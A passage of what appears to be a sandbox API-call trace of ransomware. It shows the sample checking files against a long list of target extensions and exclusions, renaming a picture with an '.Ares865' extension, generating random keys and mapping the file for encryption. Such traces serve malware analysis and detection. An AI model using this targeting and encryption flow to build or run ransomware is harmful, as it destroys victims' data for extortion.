lstrlenW (lpString="btr") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0044.040] lstrlenW (lpString="cat") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0044.040] lstrlenW (lpString="cdb") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0044.040] lstrlenW (lpString="ckp") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0044.040] lstrlenW (lpString="cma") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0044.040] lstrlenW (lpString="cpd") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0044.040] lstrlenW (lpString="dacpac") returned 6 [0044.040] lstrcmpiW (lpString1="rt.jpg", lpString2="dacpac") returned 1 [0044.040] lstrlenW (lpString="dad") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0044.040] lstrlenW (lpString="dadiagrams") returned 10 [0044.040] lstrlenW (lpString="daschema") returned 8 [0044.040] lstrcmpiW (lpString1="sert.jpg", lpString2="daschema") returned 1 [0044.040] lstrlenW (lpString="db-journal") returned 10 [0044.040] lstrlenW (lpString="db-shm") returned 6 [0044.040] lstrcmpiW (lpString1="rt.jpg", lpString2="db-shm") returned 1 [0044.040] lstrlenW (lpString="db-wal") returned 6 [0044.040] lstrcmpiW (lpString1="rt.jpg", lpString2="db-wal") returned 1 [0044.040] lstrlenW (lpString="dbc") returned 3 [0044.040] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0044.041] lstrlenW (lpString="dbs") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0044.041] lstrlenW (lpString="dbt") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0044.041] lstrlenW (lpString="dbv") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0044.041] lstrlenW (lpString="dbx") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0044.041] lstrlenW (lpString="dcb") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0044.041] lstrlenW (lpString="dct") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0044.041] lstrlenW (lpString="dcx") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0044.041] lstrlenW (lpString="ddl") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0044.041] lstrlenW (lpString="dlis") returned 4 [0044.041] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0044.041] lstrlenW (lpString="dp1") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0044.041] lstrlenW (lpString="dqy") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0044.041] lstrlenW (lpString="dsk") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0044.041] lstrlenW (lpString="dsn") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0044.041] lstrlenW (lpString="dtsx") returned 4 [0044.041] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0044.041] lstrlenW (lpString="dxl") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0044.041] lstrlenW (lpString="eco") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0044.041] lstrlenW (lpString="ecx") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0044.041] lstrlenW (lpString="edb") returned 3 [0044.041] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0044.042] lstrlenW (lpString="epim") returned 4 [0044.042] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0044.042] lstrlenW (lpString="fcd") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0044.042] lstrlenW (lpString="fdb") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0044.042] lstrlenW (lpString="fic") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0044.042] lstrlenW (lpString="flexolibrary") returned 12 [0044.042] lstrlenW (lpString="fm5") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0044.042] lstrlenW (lpString="fmp") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0044.042] lstrlenW (lpString="fmp12") returned 5 [0044.042] lstrcmpiW (lpString1="t.jpg", lpString2="fmp12") returned 1 [0044.042] lstrlenW (lpString="fmpsl") returned 5 [0044.042] lstrcmpiW (lpString1="t.jpg", lpString2="fmpsl") returned 1 [0044.042] lstrlenW (lpString="fol") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0044.042] lstrlenW (lpString="fp3") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0044.042] lstrlenW (lpString="fp4") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0044.042] lstrlenW (lpString="fp5") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0044.042] lstrlenW (lpString="fp7") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0044.042] lstrlenW (lpString="fpt") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0044.042] lstrlenW (lpString="frm") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0044.042] lstrlenW (lpString="gdb") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0044.042] lstrlenW (lpString="gdb") returned 3 [0044.042] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0044.043] lstrlenW (lpString="grdb") returned 4 [0044.043] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0044.043] lstrlenW (lpString="gwi") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0044.043] lstrlenW (lpString="hdb") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0044.043] lstrlenW (lpString="his") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0044.043] lstrlenW (lpString="ib") returned 2 [0044.043] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0044.043] lstrlenW (lpString="idb") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0044.043] lstrlenW (lpString="ihx") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0044.043] lstrlenW (lpString="itdb") returned 4 [0044.043] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0044.043] lstrlenW (lpString="itw") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0044.043] lstrlenW (lpString="jet") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0044.043] lstrlenW (lpString="jtx") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0044.043] lstrlenW (lpString="kdb") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0044.043] lstrlenW (lpString="kexi") returned 4 [0044.043] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0044.043] lstrlenW (lpString="kexic") returned 5 [0044.043] lstrcmpiW (lpString1="t.jpg", lpString2="kexic") returned 1 [0044.043] lstrlenW (lpString="kexis") returned 5 [0044.043] lstrcmpiW (lpString1="t.jpg", lpString2="kexis") returned 1 [0044.043] lstrlenW (lpString="lgc") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0044.043] lstrlenW (lpString="lwx") returned 3 [0044.043] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0044.043] lstrlenW (lpString="maf") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0044.044] lstrlenW (lpString="maq") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0044.044] lstrlenW (lpString="mar") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0044.044] lstrlenW (lpString="marshal") returned 7 [0044.044] lstrcmpiW (lpString1="ert.jpg", lpString2="marshal") returned -1 [0044.044] lstrlenW (lpString="mas") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0044.044] lstrlenW (lpString="mav") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0044.044] lstrlenW (lpString="maw") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0044.044] lstrlenW (lpString="mdbhtml") returned 7 [0044.044] lstrcmpiW (lpString1="ert.jpg", lpString2="mdbhtml") returned -1 [0044.044] lstrlenW (lpString="mdn") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0044.044] lstrlenW (lpString="mdt") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0044.044] lstrlenW (lpString="mfd") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0044.044] lstrlenW (lpString="mpd") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0044.044] lstrlenW (lpString="mrg") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0044.044] lstrlenW (lpString="mud") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0044.044] lstrlenW (lpString="mwb") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0044.044] lstrlenW (lpString="myd") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0044.044] lstrlenW (lpString="ndf") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0044.044] lstrlenW (lpString="nnt") returned 3 [0044.044] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0044.044] lstrlenW (lpString="nrmlib") returned 6 [0044.045] lstrcmpiW (lpString1="rt.jpg", lpString2="nrmlib") returned 1 [0044.045] lstrlenW (lpString="ns2") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0044.045] lstrlenW (lpString="ns3") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0044.045] lstrlenW (lpString="ns4") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0044.045] lstrlenW (lpString="nsf") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0044.045] lstrlenW (lpString="nv") returned 2 [0044.045] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0044.045] lstrlenW (lpString="nv2") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0044.045] lstrlenW (lpString="nwdb") returned 4 [0044.045] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0044.045] lstrlenW (lpString="nyf") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0044.045] lstrlenW (lpString="odb") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0044.045] lstrlenW (lpString="odb") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0044.045] lstrlenW (lpString="oqy") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0044.045] lstrlenW (lpString="ora") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0044.045] lstrlenW (lpString="orx") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0044.045] lstrlenW (lpString="owc") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0044.045] lstrlenW (lpString="p96") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0044.045] lstrlenW (lpString="p97") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0044.045] lstrlenW (lpString="pan") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0044.045] lstrlenW (lpString="pdb") returned 3 [0044.045] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0044.046] lstrlenW (lpString="pdm") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0044.046] lstrlenW (lpString="pnz") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0044.046] lstrlenW (lpString="qry") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0044.046] lstrlenW (lpString="qvd") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0044.046] lstrlenW (lpString="rbf") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0044.046] lstrlenW (lpString="rctd") returned 4 [0044.046] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0044.046] lstrlenW (lpString="rod") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0044.046] lstrlenW (lpString="rodx") returned 4 [0044.046] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0044.046] lstrlenW (lpString="rpd") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0044.046] lstrlenW (lpString="rsd") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0044.046] lstrlenW (lpString="sas7bdat") returned 8 [0044.046] lstrcmpiW (lpString1="sert.jpg", lpString2="sas7bdat") returned 1 [0044.046] lstrlenW (lpString="sbf") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0044.046] lstrlenW (lpString="scx") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0044.046] lstrlenW (lpString="sdb") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0044.046] lstrlenW (lpString="sdc") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0044.046] lstrlenW (lpString="sdf") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0044.046] lstrlenW (lpString="sis") returned 3 [0044.046] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0044.046] lstrlenW (lpString="spq") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0044.047] lstrlenW (lpString="te") returned 2 [0044.047] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0044.047] lstrlenW (lpString="teacher") returned 7 [0044.047] lstrcmpiW (lpString1="ert.jpg", lpString2="teacher") returned -1 [0044.047] lstrlenW (lpString="tmd") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0044.047] lstrlenW (lpString="tps") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0044.047] lstrlenW (lpString="trc") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0044.047] lstrlenW (lpString="trc") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0044.047] lstrlenW (lpString="trm") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0044.047] lstrlenW (lpString="udb") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0044.047] lstrlenW (lpString="udl") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0044.047] lstrlenW (lpString="usr") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0044.047] lstrlenW (lpString="v12") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0044.047] lstrlenW (lpString="vis") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0044.047] lstrlenW (lpString="vpd") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0044.047] lstrlenW (lpString="vvv") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0044.047] lstrlenW (lpString="wdb") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0044.047] lstrlenW (lpString="wmdb") returned 4 [0044.047] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0044.047] lstrlenW (lpString="wrk") returned 3 [0044.047] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0044.047] lstrlenW (lpString="xdb") returned 3 [0044.048] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0044.048] lstrlenW (lpString="xld") returned 3 [0044.048] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0044.048] lstrlenW (lpString="xmlff") returned 5 [0044.048] lstrcmpiW (lpString1="t.jpg", lpString2="xmlff") returned -1 [0044.048] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.Ares865") returned 59 [0044.048] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.ares865"), dwFlags=0x1) returned 1 [0044.048] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0044.049] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=845941) returned 1 [0044.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0044.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0044.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0044.049] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0044.050] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0044.050] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0044.050] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xceb80, lpName=0x0) returned 0x118 [0044.472] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xceb80) returned 0x1120000 [0044.765] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0044.766] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0044.766] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0044.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd0 [0044.766] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbbd0 | out: hHeap=0x2b0000) returned 1 [0044.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cb310 [0044.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0044.766] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0044.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0044.766] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cb310 [0044.767] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0044.767] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0044.767] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0044.767] UnmapViewOfFile (lpBaseAddress=0x1120000) returned 1 [0044.774] CloseHandle (hObject=0x118) returned 1 [0044.774] CloseHandle (hObject=0x120) returned 1 [0044.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0044.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0044.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0044.794] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0044.794] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0044.794] lstrlenW (lpString="desktop.ini") returned 11 [0044.794] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 51 [0044.794] lstrcpyW (in: lpString1=0x2cce452, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.794] lstrlenW (lpString="desktop.ini") returned 11 [0044.795] lstrlenW (lpString="Ares865") returned 7 [0044.795] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0044.795] lstrlenW (lpString=".dll") returned 4 [0044.795] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0044.795] lstrlenW (lpString=".lnk") returned 4 [0044.795] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0044.795] lstrlenW (lpString=".ini") returned 4 [0044.795] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0044.795] lstrlenW (lpString=".sys") returned 4 [0044.795] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0044.795] lstrlenW (lpString="desktop.ini") returned 11 [0044.795] lstrlenW (lpString="bak") returned 3 [0044.795] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0044.795] lstrlenW (lpString="ba_") returned 3 [0044.795] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0044.795] lstrlenW (lpString="dbb") returned 3 [0044.795] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0044.795] lstrlenW (lpString="vmdk") returned 4 [0044.795] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0044.795] lstrlenW (lpString="rar") returned 3 [0044.795] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0044.795] lstrlenW (lpString="zip") returned 3 [0044.795] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0044.795] lstrlenW (lpString="tgz") returned 3 [0044.795] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0044.795] lstrlenW (lpString="vbox") returned 4 [0044.795] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0044.795] lstrlenW (lpString="vdi") returned 3 [0044.795] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0044.795] lstrlenW (lpString="vhd") returned 3 [0044.795] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0044.795] lstrlenW (lpString="vhdx") returned 4 [0044.795] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0044.796] lstrlenW (lpString="avhd") returned 4 [0044.796] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0044.796] lstrlenW (lpString="db") returned 2 [0044.796] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0044.796] lstrlenW (lpString="db2") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0044.796] lstrlenW (lpString="db3") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0044.796] lstrlenW (lpString="dbf") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0044.796] lstrlenW (lpString="mdf") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0044.796] lstrlenW (lpString="mdb") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0044.796] lstrlenW (lpString="sql") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0044.796] lstrlenW (lpString="sqlite") returned 6 [0044.796] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0044.796] lstrlenW (lpString="sqlite3") returned 7 [0044.796] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0044.796] lstrlenW (lpString="sqlitedb") returned 8 [0044.796] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0044.796] lstrlenW (lpString="xml") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0044.796] lstrlenW (lpString="$er") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0044.796] lstrlenW (lpString="4dd") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0044.796] lstrlenW (lpString="4dl") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0044.796] lstrlenW (lpString="^^^") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0044.796] lstrlenW (lpString="abs") returned 3 [0044.796] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0044.796] lstrlenW (lpString="abx") returned 3 [0044.797] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0044.797] lstrlenW (lpString="accdb") returned 5 [0044.797] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0044.797] lstrlenW (lpString="accdc") returned 5 [0044.797] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0044.797] lstrlenW (lpString="accde") returned 5 [0044.797] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0044.797] lstrlenW (lpString="accdr") returned 5 [0044.797] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0044.797] lstrlenW (lpString="accdt") returned 5 [0044.797] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0044.797] lstrlenW (lpString="accdw") returned 5 [0044.797] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0044.797] lstrlenW (lpString="accft") returned 5 [0044.797] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0044.797] lstrlenW (lpString="adb") returned 3 [0044.797] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 